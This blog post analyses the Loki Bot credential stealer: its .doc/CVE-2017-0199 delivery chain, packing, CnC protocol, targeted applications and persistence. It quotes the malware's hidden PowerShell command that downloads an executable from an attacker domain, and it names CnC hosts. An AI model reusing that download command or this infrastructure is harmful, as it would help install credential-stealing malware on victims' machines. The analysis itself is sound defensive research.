over 1 year ago

A few hours after the last ransomware attack with the "NotPetya" ransomware, some files were related to the attack as attack vector. Some antimalware companies and malware research comunities spoke about some domains and samples that have been related to this attack.

By that reason, I started to analyze the samples to get to the bottom of the matter. r your tranquillity, I must say that the samples are not related to “NotPetya" ransomware but they are related to an interesting malware which I am going to explain, dubbed “Loki Bot”.

Attack vector.

Loki Bot is a sensitive information stealer. Loki Bot can read private information from a large list of Windows programs and sends it to CnC.

You can buy this malware on internet with differents modules and features.

Like some malware researchers said, the attack vector starts with a .doc file. This file exploits a known vulnerability (CVE-2017-0199 – Info) for download other file from a server (84.200.16.242/myguy.xls).

The downloaded .xls file has an embedded macro that downloads a binary file from another server using PowerShell.

We can find the script opening the xls file with an Hex Editor

After extract the script and execute it, the script will try to download a .exe file from french-cooking[.]com domain.

PowerShell command:

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden (New-Object System.Net.WebClient).DownloadFile('http://french-cooking.]com/myguy.]exe[', 'C:\Users\d00rt\AppData\Roaming\45298.exe');

Finally when myguy.exe is executed, it tries to connect with the CnC, coffeinoffice.xyz

Let's see what happens with myguy.exe ;)

Loki Bot Analysis.

MD5 A1D5895F85751DFE67D19CCCB51B051A
SHA1 9288FB8E96D419586FC8C595DD95353D48E8A060
UNPACKING

This sample is protected with a custom packer, but finally it uses the RunPE technique to unpack itself, at this moment we can dump it and start a comfortable analysis.

Unpacked MD5 49F3606755B12230BFF639361C7109A7
Unpacked SHA1 234A7174E67EEC394FAF5139BC79C69BF0EBFFB8
WINDOWS API

This sample is not easy to analyze, it has some techniques to make the analysis more difficult. For example, to perform a call to any function of Windows Api, it uses a special function. In order to make it works, the malware has to push three values, then the function will return a memory addres related to the function that it is looking for.

Main functionality

Loki Bot initializes WSASTartup, then it creates a Mutex with the same name that the machine GUID MD5.

import hashlib
mutex_name = hashlib.md5(machine_GUID).hexdigest()[:24]

Later Lokibot collects sensitive information from the supported modules and sends it to CnC.
After stealing data, it gains persistence on the system and finally it waits the CnC commands in a loop.

SENSITIVE DATA

Loki Bot supports a lot of different Windows applications to steal information. In the following table you can find all the modules that I could identify during the analysis.

Firefox SoftwareNet mSecure Bitvise 1Password
IceDragon FTPShell vnc_files WinFTP Winbox
Safari NppFTP BlazeFTP MartinPrikryl KDBX_files
K_Meleon MyFTP FAStream_NetFile FreshFTP Enpass
SeaMonkey FTPBox GoFTP BitKinex z_Mailing
Flock SherrodFTP ESTSoft_FTP UltraFXP Opera_Mail
Black_Hawk FTPNow DeluxeFTP FTPNow2 PostBox
Lunascape Nexus TotalComander VanDyke FossaMail
Comodo XFTP FTPGetter OdinFTP MailBox
Opera EasyFTP WS_FTP NCH_FLING WinChips
QtWeb SFTP_NetDrive FullTiltPoker NCH_CLASSIC Outlook
QupZilla AbleFTP PokerStars Kitty YMail2
Vault JaSFTP ExpandDrive ThunderBird TrulyMail
Cyberfox Automize Steed FoxMail spn_files
Pale_Moon Cyberduck FlashFXP PocoMail TODODesktop
WaterFox FullSync NovaFTP IncrediMail Stickies
GoogleTark FTPInfo NetDrive GmailNotifierPro NoteFly
SuperPutty LinasFTP TotalComander dcf_files Notezilla
Syncovery FileZilla SmartFTP 32BitFTP StickyNotes
FTPNavigato StaffFTP FarManager RoboForm

Loki Bot loads an array with different address and call them dynamically.

During my analysis, the malware got my gmail account data from Comodo/Dragon Browser and FileZilla config. (Look at stolen data, you can see passwords in plain text :O ).

Once the LokiBot has finished stealing data, it prepares a packet to send to CnC. The data is compressed by an algorithm.

The first data size was 0x2541 and now the size is 0xB27

The malware obtains the computer metadata to identify the stolen data with the computer where the stolen data was gotten. This metadata will be the header of the packet that will be send to CnC including some flags (data size, stolen data size per each module...) which I am not going to explain in depth in this post.

In the next image we see the final payload to send to CnC and the CnC domain:

HTTP-request (I patched the host to see the request because the real server is down). It uses "Mozilla/4.08 (Charon; Inferno)" as User-Agent.

Finally Loki Bot stay looping waiting commands from CnC, Loki Bot sends to the CnC a "clean" packet (Just with the metadata header we saw previously). If the CnC responses to the requests, Loki Bot Creates a thread for parsing the CnC answer.

I analyzed this part statically because the server is down, so some parts are not clear but I found different behaviours depending on the CnC response.

1. The CnC can asks to steal sensitive data again.  
2. The CnC can requests to the compromised computer that download, execute and load files and libraries.


Basically Loki bot looks like it can do what it want. It could perform backdoor task, or update itself with new features.

PERSISTENCE

Loki bot copies and hides itself into the next folder “C:\Users\d00rt\AppData\Roaming\72431D”. The malware sets the folder and files attributes using SetFileAttributes with 0x2006 attributes.

0x2006 Attribute
0x2 FILE_ATTRIBUTE_HIDDEN
0x4 FILE_ATTRIBUTE_SYSTEM
0x2000 FILE_ATTRIBUTE_NOT_CONTENT_INDEXED

Author: @D00RT

← Unpacking Revenge ransomware Can be a "legitimate" program an APT? →